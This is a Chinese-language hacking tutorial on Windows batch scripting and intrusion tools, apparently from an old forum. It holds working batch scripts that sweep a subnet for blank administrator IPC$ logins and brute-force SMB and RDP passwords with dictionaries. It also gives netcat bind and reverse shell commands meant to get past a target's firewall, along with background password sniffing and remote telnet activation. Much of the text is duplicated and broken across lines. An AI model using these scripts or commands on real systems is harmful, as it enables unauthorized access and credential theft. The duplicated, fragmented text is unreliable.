批处理每次能处理的变量从 %0―%9 共 10 个,其中 %0 默认给批处理文件名使用, %1 默认为使用此批处理时输入的的第一个值,同理: %2―%9 指输入的第 2-9 个值;例: net use \\ip\ipc$ pass /user:user 中 ip 为 %1,pass 为 %2 ,user 为 %3
FOR / 参数 %variable IN (set) DO command [command_parameters] %variable: 指定一个单一字母可替换的参数,如: %i ,而指定一个变量则用: %%i ,而调用变量时用: %i% ,变量是区分大小写的( %i 不等于 %I )。
批处理每次能处理的变量从 %0―%9 共 10 个,其中 %0 默认给批处理文件名使用, %1 默认为使用此批处理时输入的的第一个值,同理: %2―%9 指输入的第 2-9 个值;例: net use \\ip\ipc$ pass /user:user 中 ip 为 %1,pass 为 %2 ,user 为 %3
(set):
指定一个或一组文件,可使用通配符,如:
(D:\user.txt)
和
(1 1 254)(1 -1 254),{ “(1 1 254)”
第一个
"1"
指起始值,第二个
"1"
指增长量,第三个
"254"
指结束值,即:从
1
到
254
;
“(1 -1 254)”
说明:即从
254
到
1 }
command
:指定对第个文件执行的命令,如:
net use
命令;如要执行多个命令时,命令这间加:
&
来隔开
command_parameters :为特定命令指定参数或命令行开关
command_parameters :为特定命令指定参数或命令行开关
IN (set)
:指在
(set)
中取值;
DO command
:指执行
command
参数:
/L
指用增量形式
{ (set)
为增量形式时
}
;
/F
指从文件中不断取值,直到取完为止
{ (set)
为文件时,如
(d:\pass.txt)
时
}
。
用法举例:
@echo off
echo 用法格式: test.bat *.*.* > test.txt
用法举例:
@echo off
echo 用法格式: test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator | find "
命令成功完成
" >>test.txt
存为 test.bat 说明:对指定的一个 C 类网段的 254 个 IP 依次试建立 ***istrator 密码为空的 IPC$ 连接,如果成功就把该 IP 存在 test.txt 中。
存为 test.bat 说明:对指定的一个 C 类网段的 254 个 IP 依次试建立 ***istrator 密码为空的 IPC$ 连接,如果成功就把该 IP 存在 test.txt 中。
/L
指用增量形式(即从
1-254
或
254-1
);输入的
IP
前面三位:
*.*.*
为批处理默认的
%1
;
%%G
为变量
(ip
的最后一位);
&
用来隔开
echo
和
net use
这二个命令;
|
指建立了
ipc$
后,在结果中用
find
查看是否有
"
命令成功完成
"
信息;
%1.%%G
为完整的
IP
地址;
(1 1 254)
指起始值,增长量,结止值。
@echo off
echo 用法格式: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为: ok.exe 说明:输入一个 IP 后,用字典文件 d:\pass.dic 来暴解 d:\user.dic 中的用户密码,直到文件中值取完为止。 %%i 为用户名; %1 为输入的 IP 地址(默认)。
@echo off
echo 用法格式: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为: ok.exe 说明:输入一个 IP 后,用字典文件 d:\pass.dic 来暴解 d:\user.dic 中的用户密码,直到文件中值取完为止。 %%i 为用户名; %1 为输入的 IP 地址(默认)。
#7
七:
2
:
if
命令及变量
基本格式:
IF [not] errorlevel 数字 命令语句 如果 程序 运行最后返回一个等于或大于指定数字的退出编码,指定条件为 “ 真 ” 。
例: IF errorlevel 0 命令 指 程序 执行后返回的值为 0 时,就值行后面的命令; IF not errorlevel 1 命令指 程序 执行最后返回的值不等于 1 ,就执行后面的命令。
0 指发现并成功执行(真); 1 指没有发现、没执行(假)。
IF [not] 字符串 1== 字符串 2 命令语句 如果指定的文本字符串匹配(即:字符串 1 等于 字符串 2 ),就执行后面的命令。
例: “if "%2%"=="4" goto start” 指:如果输入的第二个变量为 4 时,执行后面的命令(注意:调用变量时就 % 变量名 % 并加 " " )
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例: “if not nc.exe goto end” 指:如果没有发现 nc.exe 文件就跳到 ":end" 标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串 1== 字符串 2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上: else 命令语句后指:当前面的条件不成立时,就指行 else 后面的命令。注意: else 必须与 if 在同一行才有效。 当有 del 命令时需把 del 命令全部内容用 < > 括起来,因为 del 命令要单独一行时才能执行,用上 < > 后就等于是单独一行了;例如: “if exist test.txt. < del test.txt.> else echo test.txt.missing ” ,注意命令中的 “.”
IF [not] errorlevel 数字 命令语句 如果 程序 运行最后返回一个等于或大于指定数字的退出编码,指定条件为 “ 真 ” 。
例: IF errorlevel 0 命令 指 程序 执行后返回的值为 0 时,就值行后面的命令; IF not errorlevel 1 命令指 程序 执行最后返回的值不等于 1 ,就执行后面的命令。
0 指发现并成功执行(真); 1 指没有发现、没执行(假)。
IF [not] 字符串 1== 字符串 2 命令语句 如果指定的文本字符串匹配(即:字符串 1 等于 字符串 2 ),就执行后面的命令。
例: “if "%2%"=="4" goto start” 指:如果输入的第二个变量为 4 时,执行后面的命令(注意:调用变量时就 % 变量名 % 并加 " " )
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例: “if not nc.exe goto end” 指:如果没有发现 nc.exe 文件就跳到 ":end" 标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串 1== 字符串 2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上: else 命令语句后指:当前面的条件不成立时,就指行 else 后面的命令。注意: else 必须与 if 在同一行才有效。 当有 del 命令时需把 del 命令全部内容用 < > 括起来,因为 del 命令要单独一行时才能执行,用上 < > 后就等于是单独一行了;例如: “if exist test.txt. < del test.txt.> else echo test.txt.missing ” ,注意命令中的 “.”
(二)系统外部命令
(
均需下载相关工具
)
:
1
、瑞士军刀:
nc.exe
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序 重定向,一但连接就执行[危险]
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到 CTR+C
-n IP 地址,不能用域名
-o film 记录 16 进制的传输
-p[ 空格 ] 端口 本地端口号
-r 随机本地及远程端口
-t 使用 Telnet 交互方式
-u UDP 模式
-v 详细输出,用 -vv 将更详细
-w 数字 timeout 延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到 192.168.0.1 主机的 80 端口
nc -l -p 80 开启本机的 TCP 80 端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚 192.168.0.1 的 80-1024 端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定 remote 主机的 cmdshell 在 remote 的 TCP 5354 端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定 remote 主机的 cmdshell 并反向连接 192.168.0.2 的 5354 端口
高级用法:
nc -L -p 80 作为蜜罐用 1 :开启并不停地监听 80 端口,直到 CTR+C 为止
nc -L -p 80 > c:\log.txt 作为蜜罐用 2 :开启并不停地监听 80 端口,直到 CTR+C, 同时把结果输出到 c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用 3-1 :开启并不停地监听 80 端口,直到 CTR+C, 并把 c:\honeyport.txt 中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用 3-2 :开启并不停地监听 80 端口,直到 CTR+C, 并把 c:\honeyport.txt 中内容送入管道中 , 亦可起到传送文件作用
本机上用: nc -l -p 本机端口
在对方主机上用: nc -e cmd.exe 本机 IP -p 本机端口 *win2K
nc -e /bin/sh 本机 IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用: nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用: nc -vv 本机 IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。 “<” ,例如: tlntadmn < test.txt 指把 test.txt 的内容赋值给 tlntadmn 命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@ dir c:\winnt >> d:\log.txt 意思是:后台执行 dir ,并把结果存在 d:\log.txt 中
> 与 >> 的区别 ">" 指:覆盖; ">>" 指:保存到 ( 添加到)。
如: @dir c:\winnt >> d:\log.txt 和 @dir c:\winnt > d:\log.txt 二个命令分别执行二次比较看:用 >> 的则是把二次的结果都保存了,而用: > 则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
-h 查看帮助信息
-d 后台模式
-e prog程序 重定向,一但连接就执行[危险]
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到 CTR+C
-n IP 地址,不能用域名
-o film 记录 16 进制的传输
-p[ 空格 ] 端口 本地端口号
-r 随机本地及远程端口
-t 使用 Telnet 交互方式
-u UDP 模式
-v 详细输出,用 -vv 将更详细
-w 数字 timeout 延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到 192.168.0.1 主机的 80 端口
nc -l -p 80 开启本机的 TCP 80 端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚 192.168.0.1 的 80-1024 端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定 remote 主机的 cmdshell 在 remote 的 TCP 5354 端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定 remote 主机的 cmdshell 并反向连接 192.168.0.2 的 5354 端口
高级用法:
nc -L -p 80 作为蜜罐用 1 :开启并不停地监听 80 端口,直到 CTR+C 为止
nc -L -p 80 > c:\log.txt 作为蜜罐用 2 :开启并不停地监听 80 端口,直到 CTR+C, 同时把结果输出到 c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用 3-1 :开启并不停地监听 80 端口,直到 CTR+C, 并把 c:\honeyport.txt 中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用 3-2 :开启并不停地监听 80 端口,直到 CTR+C, 并把 c:\honeyport.txt 中内容送入管道中 , 亦可起到传送文件作用
本机上用: nc -l -p 本机端口
在对方主机上用: nc -e cmd.exe 本机 IP -p 本机端口 *win2K
nc -e /bin/sh 本机 IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用: nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用: nc -vv 本机 IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。 “<” ,例如: tlntadmn < test.txt 指把 test.txt 的内容赋值给 tlntadmn 命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@ dir c:\winnt >> d:\log.txt 意思是:后台执行 dir ,并把结果存在 d:\log.txt 中
> 与 >> 的区别 ">" 指:覆盖; ">>" 指:保存到 ( 添加到)。
如: @dir c:\winnt >> d:\log.txt 和 @dir c:\winnt > d:\log.txt 二个命令分别执行二次比较看:用 >> 的则是把二次的结果都保存了,而用: > 则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
#8
八:
2
、扫锚工具:
xscan.exe
基本格式
xscan -host < 起始 IP>[-< 终止 IP>] < 检测项目 > [ 其他选项 ] 扫锚 " 起始 IP 到终止 IP" 段的所有主机信息
xscan -file < 主机列表文件名 > < 检测项目 > [ 其他选项 ] 扫锚 " 主机 IP 列表文件名 " 中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程 操作系统 类型(通过 NETBIOS 和 SNMP 协议)
-port 检测常用服务的端口状态
-ftp 检测 FTP 弱口令
-pub 检测 FTP 服务匿名用户写权限
-pop3 检测 POP3-Server 弱口令
-smtp 检测 SMTP-Server漏洞
-sql 检测 SQL-Server 弱口令
-smb 检测 NT-Server 弱口令
-iis 检测 IIS 编码 / 解码 漏洞
-cgi 检测 CGI漏洞
-nasl 加载 Nessus 攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器 , < 适配器编号 > 可通过 "-l" 参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量 , 并发主机数量 指定最大并发线程数量和并发主机数量 , 默认数量为 100,10
-log 文件名 指定扫描报告文件名 ( 后缀为: TXT 或 HTML 格式的文件 )
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测 192.168.1.1-192.168.255.255 网段内主机的所有 漏洞 ,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测 192.168.1.1-192.168.255.255 网段内主机的标准端口状态, NT 弱口令用户,最大并发线程数量为 150 ,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测 “hostlist.txt” 文件中列出的所有主机的标准端口状态, CGI漏洞 ,最大并发线程数量为 200 ,同一时刻最多检测 5 台主机,显示详细检测进度,跳过没有检测到开放端口的主机
xscan -host < 起始 IP>[-< 终止 IP>] < 检测项目 > [ 其他选项 ] 扫锚 " 起始 IP 到终止 IP" 段的所有主机信息
xscan -file < 主机列表文件名 > < 检测项目 > [ 其他选项 ] 扫锚 " 主机 IP 列表文件名 " 中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程 操作系统 类型(通过 NETBIOS 和 SNMP 协议)
-port 检测常用服务的端口状态
-ftp 检测 FTP 弱口令
-pub 检测 FTP 服务匿名用户写权限
-pop3 检测 POP3-Server 弱口令
-smtp 检测 SMTP-Server漏洞
-sql 检测 SQL-Server 弱口令
-smb 检测 NT-Server 弱口令
-iis 检测 IIS 编码 / 解码 漏洞
-cgi 检测 CGI漏洞
-nasl 加载 Nessus 攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器 , < 适配器编号 > 可通过 "-l" 参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量 , 并发主机数量 指定最大并发线程数量和并发主机数量 , 默认数量为 100,10
-log 文件名 指定扫描报告文件名 ( 后缀为: TXT 或 HTML 格式的文件 )
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测 192.168.1.1-192.168.255.255 网段内主机的所有 漏洞 ,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测 192.168.1.1-192.168.255.255 网段内主机的标准端口状态, NT 弱口令用户,最大并发线程数量为 150 ,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测 “hostlist.txt” 文件中列出的所有主机的标准端口状态, CGI漏洞 ,最大并发线程数量为 200 ,同一时刻最多检测 5 台主机,显示详细检测进度,跳过没有检测到开放端口的主机
#9
九:
3
、命令行方式嗅探器
: xsniff.exe
可捕获局域网内 FTP/SMTP/POP3/HTTP 协议密码
参数说明
-tcp 输出 TCP 数据报
-udp 输出 UDP 数据报
-icmp 输出 ICMP 数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP 地址 过滤 IP 地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以 ASCII 形式输出
-hex 以 16 进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在 pass.log 文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探 192.168.1.1 并过滤 tcp 和 udp 信息并以 ASCII 格式输出
可捕获局域网内 FTP/SMTP/POP3/HTTP 协议密码
参数说明
-tcp 输出 TCP 数据报
-udp 输出 UDP 数据报
-icmp 输出 ICMP 数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP 地址 过滤 IP 地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以 ASCII 形式输出
-hex 以 16 进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在 pass.log 文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探 192.168.1.1 并过滤 tcp 和 udp 信息并以 ASCII 格式输出
4
、终端服务密码破解
: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除 tscrack 组件
-f 使用- f 后面的密码
-F 间隔时间(频率)
-l 使用- l 后面的用户名
-w 使用- w 后面的密码字典
-p 使用- p 后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的 ***istrator 的登陆密码
tscrack 192.168.0.1 -l ***istrator -p 123456 用密码 123456 远程登陆 192.168.0.1 的 ***istrator 用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
( ① 存为 3389.bat) (假设现有用 SuperScan 或其它扫锚器扫到一批开有 3389 的主机 IP 列表文件 3389.txt)
3389.bat 意思是:从 3389.txt 文件中取一个 IP ,接着运行 hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l ***istrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
( ② 存为 hack.bat) ( 运行 3389.bat 就 OK ,且 3389.bat 、 hack.bat 、 3389.txt 、 pass.dic 与 tscrack.exe 在同一个目录下;就可以等待结果了 )
hack.bat 意思是:运行 tscrack.exe 用字典暴破 3389.txt 中所有主机的 ***istrator 密码,并将破解结果保存在 rouji.txt 文件中。
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除 tscrack 组件
-f 使用- f 后面的密码
-F 间隔时间(频率)
-l 使用- l 后面的用户名
-w 使用- w 后面的密码字典
-p 使用- p 后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的 ***istrator 的登陆密码
tscrack 192.168.0.1 -l ***istrator -p 123456 用密码 123456 远程登陆 192.168.0.1 的 ***istrator 用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
( ① 存为 3389.bat) (假设现有用 SuperScan 或其它扫锚器扫到一批开有 3389 的主机 IP 列表文件 3389.txt)
3389.bat 意思是:从 3389.txt 文件中取一个 IP ,接着运行 hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l ***istrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
( ② 存为 hack.bat) ( 运行 3389.bat 就 OK ,且 3389.bat 、 hack.bat 、 3389.txt 、 pass.dic 与 tscrack.exe 在同一个目录下;就可以等待结果了 )
hack.bat 意思是:运行 tscrack.exe 用字典暴破 3389.txt 中所有主机的 ***istrator 密码,并将破解结果保存在 rouji.txt 文件中。
5
、其它:
Shutdown.exe
Shutdown \\IP 地址 t:20 20 秒后将对方 NT 自动关闭( Windows 2003 系统自带工具,在 Windows2000 下用进就得下载此工具才能用。在前面 Windows 2003 DOS 命令中有详细介绍。)
fpipe.exe (TCP 端口重定向工具 ) 在第二篇中有详细说明(端口重定向绕过防火墙)
fpipe -l 80 -s 1029 -r 80 [url]www.sina.com.cn[/url] 当有人扫锚你的 80 端口时,他扫到的结果会完全是 [url]www.sina.com.cn[/url] 的主机信息
Fpipe -l 23 -s 88 -r 23 目标 IP 把本机向目标 IP 发送的 23 端口 Telnet 请求经端口重定向后,就通过 88 端口发送到目标 IP 的 23 端口。(与目标 IP 建立 Telnet 时本机就用的 88 端口与其相连接)然后:直接 Telnet 127.0.0.1 (本机 IP )就连接到目标 IP 的 23 端口了。
OpenTelnet.exe ( 远程开启 telnet 工具 )
opentelnet.exe \\IP 帐号 密码 ntlm 认证方式 Telnet 端口 (不需要上传 ntlm.exe 破坏微软的身份验证方式)直接远程开启对方的 telnet 服务后,就可用 telnet \\ip 连接上对方。
NTLM 认证方式:0:不使用 NTLM 身份验证;1:先尝试 NTLM 身份验证,如果失败,再使用用户名和密码;2:只使用 NTLM 身份验证。
Shutdown \\IP 地址 t:20 20 秒后将对方 NT 自动关闭( Windows 2003 系统自带工具,在 Windows2000 下用进就得下载此工具才能用。在前面 Windows 2003 DOS 命令中有详细介绍。)
fpipe.exe (TCP 端口重定向工具 ) 在第二篇中有详细说明(端口重定向绕过防火墙)
fpipe -l 80 -s 1029 -r 80 [url]www.sina.com.cn[/url] 当有人扫锚你的 80 端口时,他扫到的结果会完全是 [url]www.sina.com.cn[/url] 的主机信息
Fpipe -l 23 -s 88 -r 23 目标 IP 把本机向目标 IP 发送的 23 端口 Telnet 请求经端口重定向后,就通过 88 端口发送到目标 IP 的 23 端口。(与目标 IP 建立 Telnet 时本机就用的 88 端口与其相连接)然后:直接 Telnet 127.0.0.1 (本机 IP )就连接到目标 IP 的 23 端口了。
OpenTelnet.exe ( 远程开启 telnet 工具 )
opentelnet.exe \\IP 帐号 密码 ntlm 认证方式 Telnet 端口 (不需要上传 ntlm.exe 破坏微软的身份验证方式)直接远程开启对方的 telnet 服务后,就可用 telnet \\ip 连接上对方。
NTLM 认证方式:0:不使用 NTLM 身份验证;1:先尝试 NTLM 身份验证,如果失败,再使用用户名和密码;2:只使用 NTLM 身份验证。
ResumeTelnet.exe (OpenTelnet
附带的另一个工具
)
resumetelnet.exe \\IP 帐号 密码 用 Telnet 连接完对方后,就用这个命令将对方的 Telnet 设置还原,并同时关闭 Telnet 服务。
resumetelnet.exe \\IP 帐号 密码 用 Telnet 连接完对方后,就用这个命令将对方的 Telnet 设置还原,并同时关闭 Telnet 服务。
#10
十:
6
、
FTP
命令详解:
FTP
命令是
Internet
用户使用最频繁的命令之一,熟悉并灵活应用
FTP
的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台
FTP
下载,那么就必须学习
FTP
指令。
FTP
的命令行格式为:
ftp -v -d -i -n -g [ 主机名 ] ,其中
ftp -v -d -i -n -g [ 主机名 ] ,其中
-v
显示远程服务器的所有响应信息;
-n
限制
ftp
的自动登录,即不使用;
.n etrc
文件;
-d
使用调试方式;
-g
取消全局文件名。
FTP
使用的内部命令如下
(
中括号表示可选项
):
1.![cmd[args]]
:在本地机中执行交互
shell
,
exit
回到
ftp
环境,如:
!ls*.zip
2.$ macro-ame[args] : 执行宏定义 macro-name 。
2.$ macro-ame[args] : 执行宏定义 macro-name 。
3.account[password]
:
提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file] :将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
4.append local-file[remote-file] :将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii
:使用
ascii
类型传输方式。
6.bell :每个命令执行完毕后计算机响铃一次。
6.bell :每个命令执行完毕后计算机响铃一次。
7.bin
:使用二进制文件传输方式。
8.bye :退出 ftp 会话过程。
8.bye :退出 ftp 会话过程。
9.case
:在使用
mget
时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir :进入远程主机目录。
10.cd remote-dir :进入远程主机目录。
11.cdup
:进入远程主机目录的父目录。
12.chmod mode file-name :将远程主机文件 file-name 的存取方式设置为 mode ,如: chmod 777 a .out 。
12.chmod mode file-name :将远程主机文件 file-name 的存取方式设置为 mode ,如: chmod 777 a .out 。
13.close
:中断与远程服务器的
ftp
会话
(
与
open
对应
)
。
14.cr :使用 asscii 方式传输文件时,将回车换行转换为回行。
14.cr :使用 asscii 方式传输文件时,将回车换行转换为回行。
15.delete remote-file
:删除远程主机文件。
16.debug[debug-value] :设置调试方式, 显示发送至远程主机的每条命令,如: deb up 3 ,若设为 0 ,表示取消 debug 。
16.debug[debug-value] :设置调试方式, 显示发送至远程主机的每条命令,如: deb up 3 ,若设为 0 ,表示取消 debug 。
17.dir[remote-dir][local-file]
:显示远程主机目录,并将结果存入本地文件。
18.disconnection :同 close 。
18.disconnection :同 close 。
19.form format
:将文件传输方式设置为
format
,缺省为
file
方式。
20.get remote-file[local-file] : 将远程主机的文件 remote-file 传至本地硬盘的 local-file 。
20.get remote-file[local-file] : 将远程主机的文件 remote-file 传至本地硬盘的 local-file 。
21.glob
:设置
mdelete
,
mget
,
mput
的文件名扩展,缺省时不扩展文件名,同命令行的
-g
参数。
22.hash :每传输 1024 字节,显示一个 hash 符号 (#) 。
22.hash :每传输 1024 字节,显示一个 hash 符号 (#) 。
23.help[cmd]
:显示
ftp
内部命令
cmd
的帮助信息,如:
help get
。
24.idle[seconds] :将远程服务器的休眠计时器设为 [seconds] 秒。
24.idle[seconds] :将远程服务器的休眠计时器设为 [seconds] 秒。
25.image
:设置二进制传输方式
(
同
binary)
。
26.lcd[dir] :将本地工作目录切换至 dir 。
26.lcd[dir] :将本地工作目录切换至 dir 。
27.ls[remote-dir][local-file]
:显示远程目录
remote-dir
,
并存入本地文件
local-file
。
28.macdef macro-name :定义一个宏,遇到 macdef 下的空行时,宏定义结束。
28.macdef macro-name :定义一个宏,遇到 macdef 下的空行时,宏定义结束。
29.mdelete[remote-file]
:删除远程主机文件。
30.mdir remote-files local-file :与 dir 类似,但可指定多个远程文件,如 : mdir *.o.*.zipoutfile 。
30.mdir remote-files local-file :与 dir 类似,但可指定多个远程文件,如 : mdir *.o.*.zipoutfile 。
31.mget remote-files
:传输多个远程文件。
32.mkdir dir-name :在远程主机中建一目录。
32.mkdir dir-name :在远程主机中建一目录。
33.mls remote-file local-file
:同
nlist
,但可指定多个文件名。
34.mode[modename] :将文件传输方式设置为 modename , 缺省为 stream 方式。
34.mode[modename] :将文件传输方式设置为 modename , 缺省为 stream 方式。
35.modtime file-name
:显示远程主机文件的最后修改时间。
36.mput local-file :将多个文件传输至远程主机。
36.mput local-file :将多个文件传输至远程主机。
37.newer file-name
:
如果远程机中
file-name
的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file] :显示远程主机目录的文件清单,并存入本地硬盘的 local-file 。
38.nlist[remote-dir][local-file] :显示远程主机目录的文件清单,并存入本地硬盘的 local-file 。
39.nmap[inpattern outpattern]
:设置文件名映射机制,
使得文件传输时,文件中的某些字符相互转换,
如:
nmap $1.$2.$3[$1
,
$2].[$2
,
$3]
,则传输文件
a1.a2.a3
时,文件名变为
a1
,
a2
。
该命令特别适用于远程主机为非
UNIX
机的情况。
40.ntrans[inchars[outchars]] :设置文件名字符的翻译机制,如 ntrans1R ,则文件名 LLL 将变为 RRR 。
40.ntrans[inchars[outchars]] :设置文件名字符的翻译机制,如 ntrans1R ,则文件名 LLL 将变为 RRR 。
41.open host[port]
:建立指定
ftp
服务器连接,可指定连接端口。
42.passive :进入被动传输方式。
42.passive :进入被动传输方式。
43.prompt
:设置多个文件传输时的交互提示。
44.proxy ftp-cmd :在次要控制连接中,执行一条 ftp 命令, 该命令允许连接两个 ftp 服务器,以在两个服务器间传输文件。第一条 ftp 命令必须为 open ,以首先建立两个服务器间的连接。
45.put local-file[remote-file] :将本地文件 local-file 传送至远程主机。
46.pwd :显示远程主机的当前工作目录。
44.proxy ftp-cmd :在次要控制连接中,执行一条 ftp 命令, 该命令允许连接两个 ftp 服务器,以在两个服务器间传输文件。第一条 ftp 命令必须为 open ,以首先建立两个服务器间的连接。
45.put local-file[remote-file] :将本地文件 local-file 传送至远程主机。
46.pwd :显示远程主机的当前工作目录。
47.quit
:同
bye
,退出
ftp
会话。
48.quote arg1 , arg2... :将参数逐字发至远程 ftp 服务器,如: quote syst.
48.quote arg1 , arg2... :将参数逐字发至远程 ftp 服务器,如: quote syst.
49.recv remote-file[local-file]
:同
get
。
50.reget remote-file[local-file] :类似于 get , 但若 local-file 存在,则从上次传输中断处续传。
50.reget remote-file[local-file] :类似于 get , 但若 local-file 存在,则从上次传输中断处续传。
51.rhelp[cmd-name]
:请求获得远程主机的帮助。
52.rstatus[file-name] :若未指定文件名,则显示远程主机的状态, 否则显示文件状态。
52.rstatus[file-name] :若未指定文件名,则显示远程主机的状态, 否则显示文件状态。
53.rename[from][to]
:更改远程主机文件名。
54.reset :清除回答队列。
54.reset :清除回答队列。
55.restart marker
:从指定的标志
marker
处,重新开始
get
或
put
,如:
restart 130
。
56.rmdir dir-name :删除远程主机目录。
56.rmdir dir-name :删除远程主机目录。
57.runique
:设置文件名只一性存储,若文件存在,则在原文件后加后缀
.1
,
.2
等。
58.send local-file[remote-file] :同 put 。
58.send local-file[remote-file] :同 put 。
59.sendport
:设置
PORT
命令的使用。
60.site arg1 , arg2... :将参数作为 SITE 命令逐字发送至远程 ftp 主机。
60.site arg1 , arg2... :将参数作为 SITE 命令逐字发送至远程 ftp 主机。
61.size file-name
:显示远程主机文件大小,如:
site idle 7200
。
62.status :显示当前 ftp 状态。
62.status :显示当前 ftp 状态。
63.struct[struct-name]
:将文件传输结构设置为
struct-name
,
缺省时使用
stream
结构。
64.sunique :将远程主机文件名存储设置为只一 ( 与 runique 对应 ) 。
64.sunique :将远程主机文件名存储设置为只一 ( 与 runique 对应 ) 。
65.system
:显示远程主机的
操作系统
类型。
66.tenex :将文件传输类型设置为 TENEX 机的所需的类型。
66.tenex :将文件传输类型设置为 TENEX 机的所需的类型。
67.tick
:设置传输时的字节计数器。
68.trace :设置包跟踪。
68.trace :设置包跟踪。
69.type[type-name]
:设置文件传输类型为
type-name
,缺省为
ascii
,如
:type binary
,设置二进制传输方式。
70.umask[newmask] :将远程服务器的缺省 umask 设置为 newmask ,如: umask 3
70.umask[newmask] :将远程服务器的缺省 umask 设置为 newmask ,如: umask 3
71.user user-name[password][account]
:向远程主机表明自己的身份,需要口令时,必须输入口令,如:
user anonymous my@email
。
72.verbose :同命令行的 -v 参数,即设置详尽报告方式, ftp 服务器的所有响 应都将显示给用户,缺省为 on.
72.verbose :同命令行的 -v 参数,即设置详尽报告方式, ftp 服务器的所有响 应都将显示给用户,缺省为 on.
